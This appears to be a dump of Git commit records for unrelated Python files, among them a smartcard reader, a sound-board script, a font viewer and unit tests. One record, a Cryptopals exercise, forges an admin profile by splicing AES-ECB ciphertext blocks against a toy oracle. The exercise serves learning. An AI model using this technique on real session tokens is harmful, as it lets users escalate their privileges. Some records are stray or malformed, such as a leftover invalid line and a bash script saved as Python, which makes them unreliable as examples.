            if 0 <= neighbor_row < ROWS and 0 <= neighbor_col < COLUMNS:
                if mine_grid[neighbor_row][neighbor_col] == 1:
                    mine_neighbor_count += 1
    return mine_neighbor_count
class Controls:
    """Input handlers translating mouse events into grid updates."""
    # NOTE(review): invoked as Controls.mouse_down(grid) -- a plain function
    # on the class, so there is deliberately no `self` parameter.
    def mouse_down(clicked_grid):
        # Convert pixel coordinates into grid indices (accounting for the
        # per-cell margin), clamping clicks past the last row/column.
        pos = pygame.mouse.get_pos()
        col_clicked = pos[0] // (GRID_WIDTH + MARGIN)
        row_clicked = pos[1] // (GRID_HEIGHT + MARGIN)
        if row_clicked >= ROWS:
            row_clicked = ROWS - 1
        if col_clicked >= COLUMNS:
            col_clicked = COLUMNS - 1
        clicked_grid[row_clicked][col_clicked] = 1
if __name__ == "__main__":
initialize()
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
screen = get_screen()
# Holds rows that have been clicked
clicked_grid = [[0 for x in range(COLUMNS)] for y in range(ROWS)]
# Holds location of the mines
mine_grid = generate_mines()
# Loop until the user clicks the close button.
done = False
main_loop()
# Clean up
pygame.quit()
| Python | 0.000316 | |
163da52a48eb0d84cde47f7cfe99e1188350db47 | Add MOBIB Basic reader script | mobib_basic.py | mobib_basic.py | #!/bin/env python3
import sys
from smartcard.System import readers
CALYPSO_CLA = [0x94]
SELECT_INS = [0xA4]
READ_RECORD_INS = [0xB2]
GET_RESPONSE_INS = [0xC0]
TICKETING_COUNTERS_FILE_ID = [0x20, 0x69]
def main():
    """Read the remaining-trips counter from a MOBIB Basic card over PC/SC.

    Selects the ticketing counters file on the Calypso applet, reads record 1,
    and prints the summed counter bytes. Exits 1 when no reader is found and
    2 when the read fails.
    """
    local_readers = readers()
    if local_readers:
        if len(local_readers) == 1:
            readerIndex = 0
        else:
            for i, reader in enumerate(local_readers):
                print("[{}]: {}".format(i, reader))
            readerIndex = int(input("Select a reader: "))
    else:
        print("No reader detected")
        sys.exit(1)

    calypso = local_readers[readerIndex].createConnection()
    calypso.connect()

    select_apdu = CALYPSO_CLA + SELECT_INS + [0x00, 0x00, 0x02] + TICKETING_COUNTERS_FILE_ID + [0x00]
    data, sw1, sw2 = calypso.transmit(select_apdu)
    if sw1 == 0x61:
        get_response_apdu = [0x00] + GET_RESPONSE_INS + [0x00, 0x00, sw2]
        # Fix: the original transmitted the misspelled name `get_repsonse_apdu`,
        # which raised NameError whenever the card answered 61 xx.
        data, sw1, sw2 = calypso.transmit(get_response_apdu)
    read_record_apdu = CALYPSO_CLA + READ_RECORD_INS + [0x01, 0x04, 0x1D]
    data, sw1, sw2 = calypso.transmit(read_record_apdu)
    if sw1 == 0x90:
        # FIXME: each chunk of remaining trips stored on 3 bytes?
        #chunks = [data[x:x+3] for x in range(0, len(data), 3)]
        #total = 0
        #for chunk in chunks:
        #    total += chunk[2]
        #print("Number of remaining trips: {}".format(tot = chunks[i][2] for i in chunks))
        # NOTE(review): summing every record byte assumes non-counter bytes are
        # zero -- verify against the card layout (see FIXME above).
        print("Number of remaining trips: {}".format(sum(data)))
    else:
        print("Error getting number of remaining trips")
        sys.exit(2)


if __name__ == '__main__':
    main()
| Python | 0 | |
97531bdb1501748c7039d194e98408245dc5d2b2 | Make graphflow loading script | load-tx-to-graphflow.py | load-tx-to-graphflow.py | from constants import *
import csv
# Maps a wallet address or transaction hash to a compact integer node id.
walletsMap={} #address -> number OR transaction_id->number
lastNumber = 0
# Inputs (tx_hash, wallet_addr, satoshi): emit SENT edges wallet -> tx.
with open(IN_TRANSACTION_CSV_LOCATION, 'rb') as tx_in_file:
    in_reader = csv.reader(tx_in_file, delimiter=",")
    for row in in_reader:
        tx_hash = row[0]
        wallet_addr = row[1]
        tx_amt = row[2]
        if wallet_addr in walletsMap:
            wallet_id = walletsMap[wallet_addr]
        else:
            wallet_id = lastNumber
            walletsMap[wallet_addr] = wallet_id
            lastNumber+=1
        if tx_hash in walletsMap:
            tx_id = walletsMap[tx_hash]
        else:
            tx_id = lastNumber
            walletsMap[tx_hash] = tx_id
            lastNumber+=1
        print("CREATE ("+str(wallet_id)+":wallet {address: {"+wallet_addr+"}}) -[:SENT {satoshi: {"+str(tx_amt)+"}}] -> ("+str(tx_id)+":tx {hash:"+tx_hash+"})")
# Outputs: same id-assignment logic, emitting RECEIVED edges instead.
# NOTE(review): this loop duplicates the id-assignment above; a shared helper
# would remove the repetition.
with open(OUT_TRANSACTION_CSV_LOCATION, 'rb') as tx_out_file:
    out_reader = csv.reader(tx_out_file, delimiter=",")
    for row in out_reader:
        tx_hash = row[0]
        wallet_addr = row[1]
        tx_amt = row[2]
        if wallet_addr in walletsMap:
            wallet_id = walletsMap[wallet_addr]
        else:
            wallet_id = lastNumber
            walletsMap[wallet_addr] = wallet_id
            lastNumber+=1
        if tx_hash in walletsMap:
            tx_id = walletsMap[tx_hash]
        else:
            tx_id = lastNumber
            walletsMap[tx_hash] = tx_id
            lastNumber+=1
        print("CREATE ("+str(wallet_id)+":wallet {address: {"+wallet_addr+"}}) -[:RECEIVED {satoshi: {"+str(tx_amt)+"}}] -> ("+str(tx_id)+":tx {hash:"+tx_hash+"})")
| Python | 0.000002 | |
7f6aab7dc177dc1178eca30e0ba40874b217e7cf | Create *variable.py | *variable.py | *variable.py | def num(*nums): // One * takes in any number of single data type, in this case : Int
def num(*nums):
    """Sum any number of positional arguments.

    A single * collects all positional arguments into the tuple ``nums``.
    Fixes the original tutorial snippet: valid '#' comments instead of '//',
    no shadowing of the builtin ``sum``, and the demo call now invokes ``num``
    (the original called the builtin ``sum`` with the wrong arguments).
    """
    total = 0
    for x in nums:
        total += x
    return total


num(22, 33, 44, 55, 66)  # you can pass as many numbers as you wish


def whatever(**kwargs):
    """Print selected keyword arguments.

    A double ** collects keyword arguments of any value type into the dict
    ``kwargs``; the original printed undefined bare names and used invalid
    dict-literal syntax at the call site.
    """
    print(kwargs['first_name'])
    print(kwargs['last_name'])
    print(kwargs['age'])


whatever(first_name='John', last_name='Lee', age=22)
| Python | 0.000001 | |
70da5f3657ee847f315b0d0dfbe5adb393c55ca6 | add system_info.py | system_info.py | system_info.py | # -*- coding: utf-8 -*-
"""System info"""
import platform
import subprocess
import sys
import numpy
class SystemInfo:
"""Collect system info."""
@property
def platform(self):
"""Info on the underlying platform."""
return platform.platform()
@property
def architecture(self):
"""System architecture."""
is_64bits = sys.maxsize > 2**32
arch = '64bits' if is_64bits else '32bits'
return arch
@property
def python(self):
"""Python version."""
return sys.version
@property
def numpy(self):
"""Numpy version."""
return numpy.__version__
@property
def gfortran(self):
"""gfortran version."""
return subprocess.run(['gfortran', '-v'],
stderr=subprocess.PIPE).stderr.decode()
@classmethod
def attrs(cls):
"""Available system infos."""
return [p for p in dir(cls) if isinstance(getattr(cls, p), property)]
def __repr__(self):
fmt = '\n'.join(['%s'] * 3 + ['\n'])
return ''.join(
[fmt % (a, '=' * len(a), getattr(self, a)) for a in self.attrs()])
if __name__ == '__main__':
# print out system info
print(SystemInfo())
| Python | 0.000002 | |
2910f54c75e3f7cc9d7be08886547060a7e69b69 | Implement basic CLI control | pusher.py | pusher.py | from __future__ import print_function, absolute_import, unicode_literals, division
from stackable.stack import Stack
from stackable.utils import StackablePickler
from stackable.network import StackableSocket, StackablePacketAssembler
from stackable.stackable import StackableError
from runnable.network import RunnableServer, RequestObject
from subprocess import Popen, PIPE
from threading import Thread, Lock
from sys import argv
class DispatchPusher(object):
	"""Client that pushes compiled modules to a dispatch server and monitors replies."""
	def __init__(self, ip=None, port=None):
		self.stack = None
		if ip is not None and port is not None:
			self.connect(ip, port)

	def connect(self, ip, port):
		"""Open a pickling packet stream to the dispatch server."""
		layers = (StackableSocket(ip=ip, port=port),
			  StackablePacketAssembler(),
			  StackablePickler())
		self.stack = Stack(layers)

	def push_module(self, name, module):
		"""Upload a compiled module under the given name."""
		self.stack.write({'cmd': 'module', 'args': {'name': name, 'module': module}})

	def dispatch(self, dispatcher, module):
		"""Ask the server to run a previously pushed module on a dispatcher."""
		self.stack.write({'cmd': 'dispatch', 'args': {'dispatcher': dispatcher, 'module': module}})

	def status(self, dispatcher, job):
		"""Request the status of a job on a dispatcher."""
		self.stack.write({'req': 'status', 'args': {'dispatcher': dispatcher, 'id': job}})

	def close(self):
		"""Close the connection."""
		self.stack.close()

	def monitor(self):
		"""Print every message from the server forever (run in a daemon thread)."""
		while True:
			print(self.stack.read())
# CLI: connect to the dispatch server given on the command line and read
# commands interactively. NOTE(review): uses raw_input, so this targets
# Python 2 despite the __future__ imports.
dp = DispatchPusher(argv[1], int(argv[2]))
a = Thread(target=dp.monitor)
a.daemon = True
a.start()
mode = 'file'
while True:
	x = raw_input('[%s] ' % mode)
	if x == '':
		continue
	# '!!<name>' switches the input mode (file / dispatch / console).
	if x[:2] == '!!':
		mode = x[2:]
		print(' --> Changing mode to %s' % mode)
		continue
	if mode == 'file':
		# Compile the named .py file and push its code object to the server.
		name = x.rpartition('/')[2].partition('.py')[0]
		f = b''
		try:
			f = open(x).read()
		except:
			# NOTE(review): bare except; a failed read still falls through to
			# compile the empty default -- confirm this is intentional.
			print(' --> Failed to read %s' % name)
		code = compile(f, name, mode='exec', dont_inherit=True)
		print(' --> Prepared %s' % name)
		dp.push_module(name, code)
	elif mode == 'dispatch':
		# Input format: "<dispatcher> <module>".
		x = x.partition(' ')
		print(' --> Dispatching', x[2], 'to', x[0])
		dp.dispatch(x[0], x[2])
	elif mode == 'console':
		if x == 'close':
			dp.close()
			raise KeyboardInterrupt()
# NOTE(review): unreachable -- the loop above only exits by raising.
print("[PUSHER] Ready")
| Python | 0.000001 | |
e10ed243f6cae2e020d468bbd13a619e45ed0c5d | Add a forgotten migration | sponsors/migrations/0011_auto_20170629_1208.py | sponsors/migrations/0011_auto_20170629_1208.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 10:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sponsors', '0010_auto_20170627_2001'),
]
operations = [
migrations.AlterField(
model_name='sponsor',
name='type',
field=models.CharField(choices=[('diamond', 'Diamond Sponsor'), ('lanyard', 'Lanyard Sponsor'), ('track', 'Track Sponsor'), ('foodanddrinks', 'Food & Drinks Sponsor'), ('standard', 'Standard Sponsor'), ('supporter', 'Supporter Sponsor'), ('mainmedia', 'Main Media Sponsor'), ('media', 'Media sponsors')], default='standard', max_length=255),
),
]
| Python | 0.000029 | |
ca5d47f3749c188d0858e996ba0253077260cd6c | Create GetUserGraphInstagram.py | GetUserGraphInstagram.py | GetUserGraphInstagram.py | #! /bin/bash
# Fetch follow/followed-by graphs for Instagram user ids 1..5 via the legacy
# v1 API, one JSON file per user under followers/ and followedby/.
# NOTE(review): replace XXXXXX with a real access token; the v1 API has since
# been retired -- verify the endpoint before relying on this.
for (( i=1; i <= 5; i++ ))
do
userid=$i
curl https://api.instagram.com/v1/users/$userid/follows?access_token=XXXXXX > followers/$userid.followers
curl https://api.instagram.com/v1/users/$userid/followed-by?access_token=XXXXXX > followedby/$userid.followedby
done
| Python | 0 | |
a8f4f0aa06e1469e758d5775bfea4176c7561e9f | Create stop_playlist.py | HA/syno/stop_playlist.py | HA/syno/stop_playlist.py | #!/usr/bin/python
import sys
import http.cookiejar, urllib.request, urllib.error, urllib.parse
import json
import codecs
# Shared cookie jar: the AudioStation session cookie set by the auth call
# is automatically sent with every later API request made via this opener.
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
# NAS connection settings -- placeholders, fill in before running.
IP_syno = "IP_OF_YOUR_NAS"
LOGIN = "********"
PASSWORD = "********"
# Name of the remote player to stop, taken from the command line.
# NOTE(review): indexing argv[1] unconditionally raises IndexError when no
# argument is supplied; consider printing a usage message instead.
player = sys.argv[1]
opener.addheaders = [
    ('User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11'),
]
#URL to send requests to Synology
urlAuth = "http://" + IP_syno + ":5000/webapi/auth.cgi?api=SYNO.API.Auth&version=2&method=login&account=" + LOGIN + "&passwd=" \
          + PASSWORD + "&session=AudioStation&format=cookie"
urlPlayers = "http://" + IP_syno + ":5000/webapi/AudioStation/remote_player.cgi?api=SYNO.AudioStation.RemotePlayer&version=1&method=list"
# Authenticate first so the session cookie lands in the cookie jar.
opener.open(urlAuth)
#Get Players list as JSON
pagePlayers = opener.open(urlPlayers)
strPlayers = codecs.getreader(pagePlayers.headers.get_content_charset())
jsonPlayers = json.load(strPlayers(pagePlayers))['data']['players']
#print(jsonPlayers)
#Get Player ID required to send http command to play content on the chosen player on Synology
# Find the requested player by name and tell it to stop playback.
for d in jsonPlayers:
    PlayerName = d['name']
    if PlayerName == player:
        PlayerID = d['id']
        # NOTE(review): this line was truncated in the original source
        # ("...&version=$", an unterminated string literal, i.e. a
        # SyntaxError).  Restored with API version 1, matching the
        # remote_player "list" call above.
        urlStop = "http://" + IP_syno + ":5000/webapi/AudioStation/remote_player.cgi?api=SYNO.AudioStation.RemotePlayer&method=control&action=stop&id=" + PlayerID + "&version=1"
        opener.open(urlStop)
| Python | 0.000008 | |
b6daa366a38f224132c8f276d3fbc212964900c2 | add currency | zametki/currency.py | zametki/currency.py | import requests as req
def getUSD_RUB():
    """Return the current USD -> RUB exchange rate as a float.

    Queries the fixer.io "latest rates" endpoint with USD as the base
    currency.  A 10-second timeout prevents the call from hanging forever
    on an unresponsive endpoint, and HTTP errors raise immediately instead
    of surfacing later as a confusing KeyError.
    """
    currency_url = 'http://api.fixer.io/latest?symbols=RUB&base=USD'
    response = req.get(currency_url, timeout=10)
    response.raise_for_status()  # fail loudly on 4xx/5xx responses
    return response.json()['rates']['RUB']
#print(getUSD_RUB())
| Python | 0.999995 | |
df5884cd07d30f8b027b193bc819b61f7a6bdd31 | Create cap_sense_test.py | MPR121/cap_sense_test.py | MPR121/cap_sense_test.py | #!/usr/bin/python
######################################################################
"""
cap_sense_test.py - demo to use 12-channel MPR121 capacitive touch
sensor controller as a sound board.
Bart Spainhour <bart@tinkernauts.org>
From Freescale Semiconductor whitepaper:
Proximity Capacitive Touch Sensor Controller - MPR121 OVERVIEW
The MPR121 is the second generation capacitive touch sensor controller
after the initial release of the MPR03x series devices. The MPR121
features increased internal intelligence, some of the major additions
include an increased electrode count, a hardware configurable I2C
address, an expanded filtering system with debounce, and completely
independent electrodes with auto-configuration built in. The device
also features a 13th simulated sensing channel dedicated for near
proximity detection using the multiplexed sensing inputs.
"""
######################################################################
import sys
import time
import Adafruit_MPR121.MPR121 as MPR121
import os
######################################################################
__author__ = "Bart Spainhour"
__email__ = "bart@tinkernauts.org"
######################################################################
# Open communication with MPR121 using default I2C address (0x5A)
# Create MPR121 instance
cap = MPR121.MPR121()
# Check for MPR121 initialization failure
if not cap.begin():
print 'MPR121 init error; check connections.'
sys.exit(1)
######################################################################
# Set sound samples for each cap sensor channel
#
# Drum Kit Layout
#
sound00 = "samples/drum_cymbal_hard.wav"
sound01 = "samples/drum_cymbal_closed.wav"
sound02 = "samples/drum_cymbal_open.wav"
sound03 = "samples/drum_tom_hi_hard.wav"
sound04 = "samples/drum_tom_mid_hard.wav"
sound05 = "samples/drum_tom_lo_hard.wav"
sound06 = "samples/drum_splash_hard.wav"
sound09 = "samples/drum_splash_soft.wav"
sound07 = "samples/drum_heavy_kick.wav"
sound08 = "samples/drum_snare_hard.wav"
sound10 = "samples/drum_bass_hard.wav"
sound11 = "samples/drum_bass_soft.wav"
# # Animal Noise Layout
# #
# sound00 = "sounds/Animal/Horse.wav"
# sound01 = "sounds/Animal/Bird.wav"
# sound02 = "sounds/Animal/Crickets.wav"
# #
# sound03 = "sounds/Animal/Dog2.wav"
# sound04 = "sounds/Animal/Kitten.wav"
# sound05 = "sounds/Animal/Owl.wav"
# #
# sound06 = "sounds/Animal/Duck.wav"
# sound09 = "sounds/Animal/WolfHowl.wav"
# #
# sound07 = "sounds/Animal/Rooster.wav"
# sound08 = "sounds/Animal/Dog1.wav"
# #
# sound10 = "sounds/Animal/Goose.wav"
# sound11 = "sounds/Animal/Meow.wav"
# other sounds from Sonic Pi /opt/sonic-pi/etc/:
# samples/drum_cymbal_pedal.wav
# samples/drum_snare_soft.wav
# samples/drum_tom_hi_soft.wav
# samples/drum_tom_lo_soft.wav
# samples/drum_tom_mid_soft.wav
# samples/drum_cymbal_soft.wav
# other sounds from Scratch /usr/share/scratch/Media/:
# sounds/Animal/Horse.wav
# sounds/Animal/HorseGallop.wav
# sounds/Animal/Bird.wav
# sounds/Animal/Crickets.wav
# sounds/Animal/Dog2.wav
# sounds/Animal/Kitten.wav
# sounds/Animal/Meow.wav
# sounds/Animal/Owl.wav
# sounds/Animal/Duck.wav
# sounds/Animal/WolfHowl.wav
# sounds/Animal/Rooster.wav
# sounds/Animal/Cricket.wav
# sounds/Animal/Dog1.wav
# sounds/Animal/Goose.wav
# sounds/Animal/SeaLion.mp3
# sounds/Animal/Cat.mp3
# Main Loop
try:
print 'Press Ctrl-C to quit.'
while True:
if cap.is_touched(0):
# print 'pin 00 touched'
os.system('aplay -q ' + sound00 +' &')
#
if cap.is_touched(1):
# print 'pin 01 touched'
os.system('aplay -q ' + sound01 +' &')
#
if cap.is_touched(2):
# print 'pin 02 touched'
os.system('aplay -q ' + sound02 +' &')
#
if cap.is_touched(3):
# print 'pin 03 touched'
os.system('aplay -q ' + sound03 +' &')
#
if cap.is_touched(4):
# print 'pin 04 touched'
os.system('aplay -q ' + sound04 +' &')
#
if cap.is_touched(5):
# print 'pin 05 touched'
os.system('aplay -q ' + sound05 +' &')
#
if cap.is_touched(6):
# print 'pin 06 touched'
os.system('aplay -q ' + sound06 +' &')
#
if cap.is_touched(7):
# print 'pin 07 touched'
os.system('aplay -q ' + sound07 +' &')
#
if cap.is_touched(8):
# print 'pin 08 touched'
os.system('aplay -q ' + sound08 +' &')
#
if cap.is_touched(9):
# print 'pin 09 touched'
os.system('aplay -q ' + sound09 +' &')
#
if cap.is_touched(10):
# print 'pin 10 touched'
os.system('aplay -q ' + sound10 +' &')
#
if cap.is_touched(11):
# print 'pin 11 touched'
os.system('aplay -q ' + sound11 +' &')
#
#
time.sleep(0.1)
except KeyboardInterrupt:
print ''
print 'End.'
sys.exit(1)
| Python | 0 | |
16883c227549707ef2a66d7e6020809fe9ecd909 | Add visitor base class | tater/visit.py | tater/visit.py | from tater.utils import CachedAttr
class _MethodDict(dict):
    '''Dict for caching visitor methods.

    Maps a key to the owning visitor's ``visit_<ClassName>`` bound method,
    or to ``None`` when the visitor defines no handler for that class.
    '''
    def __init__(self, visitor):
        # The visitor instance whose visit_* methods are looked up.
        self.visitor = visitor
    def __missing__(self, node):
        # Invoked on a cache miss with the *node* being dispatched.
        name = node.__class__.__name__
        method = getattr(self.visitor, 'visit_' + name, None)
        # NOTE(review): the result is cached under the class *name*, but
        # lookups (VisitorBase._visit_node does ``self._methods[node]``)
        # are keyed by the node instance itself, so this entry is never
        # hit again for a different node of the same class -- the getattr
        # effectively runs on every visit.  Consider keying lookups by
        # ``type(node).__name__`` instead (requires a coordinated change
        # in VisitorBase).
        self[name] = method
        return method
class VisitorBase(object):
    """Base class for tree visitors.

    Subclasses define ``visit_<ClassName>`` handlers; :meth:`visit` walks
    a node and all of its descendants depth-first (parents before
    children), dispatches each node to the matching handler if one
    exists, and finally calls :meth:`finalize`.
    """

    @CachedAttr
    def _methods(self):
        # Lazily-created cache of visit_* handler lookups.
        return _MethodDict(visitor=self)

    def visit(self, node):
        # Remember the root, walk the whole subtree, then finish up.
        self.node = node
        self._visit_nodes(node)
        self.finalize()

    def _visit_nodes(self, node):
        # Pre-order traversal: dispatch this node first, then recurse
        # into each of its children in order.
        self._visit_node(node)
        for child in node.children:
            self._visit_nodes(child)

    def _visit_node(self, node):
        # Dispatch a single node to its visit_* handler, if any.
        handler = self._methods[node]
        if handler is None:
            return None
        return handler(node)

    def finalize(self):
        # Hook for subclasses; invoked once after the full traversal.
        pass
| Python | 0 | |
f291633a4a24aed310f46798ffa2472db4539aaf | Add a pyunit test for type-checking utilities | h2o-py/tests/testdir_misc/pyunit_typechecks.py | h2o-py/tests/testdir_misc/pyunit_typechecks.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Pyunit for h2o.utils.typechecks."""
from __future__ import absolute_import, division, print_function
from h2o.exceptions import H2OTypeError, H2OValueError
from h2o.utils.typechecks import (U, assert_is_type, assert_matches, assert_satisfies)
def test_asserts():
    """Test type-checking functionality."""
    def assert_error(*args, **kwargs):
        # Helper: assert_is_type(*args) must raise H2OTypeError, and the
        # error must stringify to something reasonably short.
        try:
            assert_is_type(*args, **kwargs)
            raise RuntimeError("Failed to throw an exception")
        except H2OTypeError as e:
            # Check whether the message can stringify properly
            message = str(e)
            assert len(message) < 1000
            return
        raise RuntimeError("???")
    class A(object): pass
    class B(A): pass
    # --- values that must be accepted -----------------------------------
    assert_is_type(3, int)
    assert_is_type(2**100, int)
    assert_is_type("3", str)
    assert_is_type(u"3", str)
    assert_is_type("foo", u"foo")
    assert_is_type(u"foo", "foo")
    assert_is_type("I", *list("ABCDEFGHIJKL"))
    assert_is_type(False, bool)
    assert_is_type(43, str, bool, int)
    assert_is_type(4 / 3, int, float)
    assert_is_type(None, None)
    assert_is_type(None, A, str, None)
    # --- container types: [T] lists, {T} sets, {K: V} dicts, (..) tuples
    assert_is_type([], [float])
    assert_is_type([1, 4, 5], [int])
    assert_is_type([1.0, 2, 5], [int, float])
    assert_is_type([[2.0, 3.1, 0], [2, 4.4, 1.1], [-1, 0]], [[int, float]])
    assert_is_type([1, None, 2], [int, float, None])
    assert_is_type({1, 5, 1, 1, 3}, {int})
    assert_is_type({1, "hello", 3}, {int, str})
    assert_is_type({"foo": 1, "bar": 2}, {str: int})
    assert_is_type({"foo": 3, "bar": [5], "baz": None}, {str: U(int, None, [int])})
    assert_is_type({"foo": 1, "bar": 2}, {"foo": int, "bar": U(int, float, None)})
    assert_is_type((1, 3), (int, int))
    assert_is_type(("a", "b", "c"), (int, int, int), (str, str, str))
    assert_is_type([1, [2], [{3}]], [int, [int], [{3}]])
    # --- class hierarchies and literal-value types ----------------------
    assert_is_type(A(), None, A)
    assert_is_type(B(), None, A)
    assert_is_type(A, type)
    for a in range(-2, 5):
        assert_is_type(a, -2, -1, 0, 1, 2, 3, 4)
    # --- values that must be rejected (H2OTypeError expected) -----------
    assert_error(3, str)
    assert_error("Z", *list("ABCDEFGHIJKL"))
    assert_error(u"Z", "a", "...", "z")
    assert_error("X", u"x")
    assert_error(0, bool)
    assert_error(0, float, str, bool, None)
    assert_error([1, 5], [float])
    assert_error((1, 3), (int, str), (str, int), (float, float))
    assert_error(A(), None, B)
    assert_error(A, A)
    assert_error({"foo": 1, "bar": "2"}, {"foo": int, "bar": U(int, float, None)})
    assert_error(3, 0, 2, 4)
    # --- assert_matches (regex) and assert_satisfies (predicates) -------
    url_regex = r"^(https?)://((?:[\w-]+\.)*[\w-]+):(\d+)/?$"
    assert_matches("Hello, world!", r"^(\w+), (\w*)!$")
    assert_matches("http://127.0.0.1:3233/", url_regex)
    m = assert_matches("https://localhost:54321", url_regex)
    assert m.group(1) == "https"
    assert m.group(2) == "localhost"
    assert m.group(3) == "54321"
    x = 5
    assert_satisfies(x, x < 1000)
    assert_satisfies(x, x ** x > 1000)
    assert_satisfies(url_regex, url_regex.lower() == url_regex)
    try:
        assert_satisfies(url_regex, url_regex.upper() == url_regex)
    except H2OValueError as e:
        # The failing source expression must be quoted in the message.
        assert "url_regex.upper() == url_regex" in str(e), "Error message is bad: " + str(e)
# This test doesn't really need a connection to H2O cluster.
test_asserts()
| Python | 0 | |
7dd4919809c626d83cfc17447396aff98e636cfe | Add problem 13 | problem_13.py | problem_13.py | from collections import OrderedDict
from crypto_library import ecb_aes_encrypt, ecb_aes_decrypt
from problem_12 import find_blocksize
from crypto_library import apply_pkcs_7_padding
# Fixed 16-byte AES key; kept secret from the "attacker" code below.
ENCRYPTION_KEY = ',y!3<CWn@1?wwF]\x0b'
def oracle(adversary_input):
    # Encryption oracle for the ECB cut-and-paste exercise: embed the
    # attacker-controlled email address in a profile string and return it
    # encrypted with AES-ECB under the fixed key.
    profile = profile_for(adversary_input)
    return ecb_aes_encrypt(profile, ENCRYPTION_KEY)
def destructure(structured):
    """Parse a "k1=v1&k2=v2" query string into an OrderedDict.

    The result preserves the order in which the parameters appear in the
    input.  (The original built a plain dict first and only then wrapped
    it in OrderedDict, which discards the insertion order on Python 2.)
    """
    destructured = OrderedDict()
    for attr in structured.split('&'):
        parameter, value = attr.split('=')
        destructured[parameter] = value
    return destructured
def structure(destructured):
    """Serialize a mapping back into "k1=v1&k2=v2" form."""
    pairs = []
    for parameter, value in destructured.items():
        pairs.append(parameter + '=' + value)
    return '&'.join(pairs)
def profile_for(email_addr):
    """Build the encoded profile string for *email_addr*.

    Raises ValueError when the address contains metacharacters that would
    let the caller inject extra key=value pairs into the profile.
    """
    for forbidden in ('&', '='):
        if forbidden in email_addr:
            raise ValueError('Email address cannot contain "&" or "="')
    profile = OrderedDict([
        ('email', email_addr),
        ('uid', '10'),
        ('role', 'user'),
    ])
    return structure(profile)
# --- ECB cut-and-paste attack (Cryptopals challenge 13) ----------------
# Forge a "role=admin" profile by splicing ECB ciphertext blocks.
# NOTE(review): the "/" divisions below rely on Python 2 integer
# division; under Python 3 range() would receive a float and raise.
blocksize = find_blocksize(oracle)
# Admin mail length should result in length("email=<admin_mail>&uid=10&role=") multiple of blocksize
admin_mail = 'jim1@test.com'
ciphertext = oracle(admin_mail)
# All blocks minus the last are the encryption of "email=<admin_mail>&uid=10&role="
cipher_blocks = [ciphertext[i*blocksize:(i+1)*blocksize] for i in range(len(ciphertext)/blocksize)]
padded_admin = apply_pkcs_7_padding('admin')
encrypted_padded_admin = oracle((blocksize-len('email='))*'0' + padded_admin)
encrypted_padded_admin_blocks = [encrypted_padded_admin[i*blocksize:(i+1)*blocksize] for i in range(len(encrypted_padded_admin)/blocksize)]
# The second block is the encryption of the padded "admin" string
encrypted_padded_admin_block = encrypted_padded_admin_blocks[1]
# Replace the last block of the profile ciphertext with the valid padded "admin" block
admin_encrypted_profile = ''.join(cipher_blocks[:-1] + [encrypted_padded_admin_block])
print 'Encrypted:', admin_encrypted_profile
print 'Decrypted:', ecb_aes_decrypt(admin_encrypted_profile, ENCRYPTION_KEY)
| Python | 0.000001 | |
253ad82c316bd6d11dcf798e626b7eaf638867bd | add simple font comparison tool in examples | examples/font_comparison.py | examples/font_comparison.py | #!/usr/bin/env python
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''A simple tool that may be used to compare font faces.
Use the left/right cursor keys to change font faces.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import pyglet
FONTS = ['Consolas', 'Andale Mono', 'Inconsolata', 'Inconsolata-dz', 'Monaco',
'Menlo']
SAMPLE = '''class Spam(object):
def __init__(self):
# The quick brown fox
self.spam = {"jumped": 'over'}
@the
def lazy(self, *dog):
self.dog = [lazy, lazy]'''
class Window(pyglet.window.Window):
    """Window showing SAMPLE rendered in the currently selected face."""

    # Index into FONTS of the face currently on display.
    font_num = 0

    def on_text_motion(self, motion):
        # Cycle through FONTS (with wrap-around) on the cursor keys,
        # then rebuild the heading and sample-text labels for the face.
        if motion == pyglet.window.key.MOTION_RIGHT:
            self.font_num = (self.font_num + 1) % len(FONTS)
        elif motion == pyglet.window.key.MOTION_LEFT:
            self.font_num = (self.font_num - 1) % len(FONTS)
        face = FONTS[self.font_num]
        self.head = pyglet.text.Label(
            face, font_size=24, y=0, anchor_y='bottom')
        self.text = pyglet.text.Label(
            SAMPLE, font_name=face, font_size=18, y=self.height,
            anchor_y='top', width=self.width, multiline=True)

    def on_draw(self):
        # Repaint: clear the frame, then draw the heading and sample.
        self.clear()
        self.head.draw()
        self.text.draw()
# Create the window, force an initial label build (motion=None leaves
# font_num at 0), then hand control to pyglet's event loop.
window = Window()
window.on_text_motion(None)
pyglet.app.run()
| Python | 0 | |
